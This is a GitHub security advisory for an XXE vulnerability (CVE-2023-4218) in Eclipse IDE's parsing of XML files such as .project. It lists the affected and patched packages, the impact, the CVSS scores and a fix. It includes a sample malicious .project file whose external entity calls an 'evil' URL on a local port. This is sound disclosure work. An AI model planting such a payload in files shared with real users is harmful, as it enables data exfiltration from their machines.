Skip to content

Eclipse IDE XXE in eclipse.platform

Moderate severity GitHub Reviewed Published Nov 29, 2023 in eclipse-platform/eclipse.platform • Updated Mar 5, 2024

Package

maven org.eclipse.jdt:org.eclipse.jdt.ui (Maven)

Affected versions

< 3.30.0

Patched versions

3.30.0
maven org.eclipse.platform:org.eclipse.core.runtime (Maven)
< 3.29.0
3.29.0
maven org.eclipse.platform:org.eclipse.jface (Maven)
< 3.31.0
3.31.0
maven org.eclipse.platform:org.eclipse.platform (Maven)
< 4.29.0
4.29.0
maven org.eclipse.platform:org.eclipse.ui.forms (Maven)
< 3.13.0
3.13.0
maven org.eclipse.platform:org.eclipse.ui.ide (Maven)
< 3.21.100
3.21.100
maven org.eclipse.platform:org.eclipse.ui.workbench (Maven)
< 3.130.0
3.130.0
maven org.eclipse.platform:org.eclipse.urischeme (Maven)
< 1.3.100
1.3.100

Description

Impact

xml files like ".project" are parsed vulnerable against all sorts of XXE attacks. The user just needs to open any evil project or update an open project with a vulnerable file (for example for review a foreign repository or patch).

Vulnerablility was found by static code analysis (SonarLint).

Example .project file:

<?xml version="1.0" encoding="utf-8"?> 
<!DOCTYPE price [
<!ENTITY xxe SYSTEM "http://127.0.0.1:49416/evil">]>
<projectDescription>
	<name>p</name>
	<comment>&xxe;</comment>
</projectDescription>

Patches

Similar patches including junit test that shows the vulnerability have already applied to PDE (see eclipse-pde/eclipse.pde#667). A solution to platform should be the same: just reject parsing any XML that contains any DOCTYPE.

Workarounds

No known workaround. User can only avoid to get/open any foreign files with eclipse. Firewall rules against loss of data (but not against XML bomb).

References

https://cwe.mitre.org/data/definitions/611.html
https://rules.sonarsource.com/java/RSPEC-2755
https://gitlab.eclipse.org/security/vulnerability-reports/-/issues/8 (Report for multiple projects affected)

References

Published to the GitHub Advisory Database Nov 30, 2023
Reviewed Nov 30, 2023
Last updated Mar 5, 2024

Severity

Moderate
5.0
/ 10

CVSS base metrics

Attack vector
Local
Attack complexity
Low
Privileges required
Low
User interaction
Required
Scope
Unchanged
Confidentiality
High
Integrity
None
Availability
None
CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N

Weaknesses

No CWEs

CVE ID

CVE-2023-4218

GHSA ID

GHSA-j24h-xcpc-9jw8

Credits

Loading Checking history
See something to contribute? Suggest improvements for this vulnerability.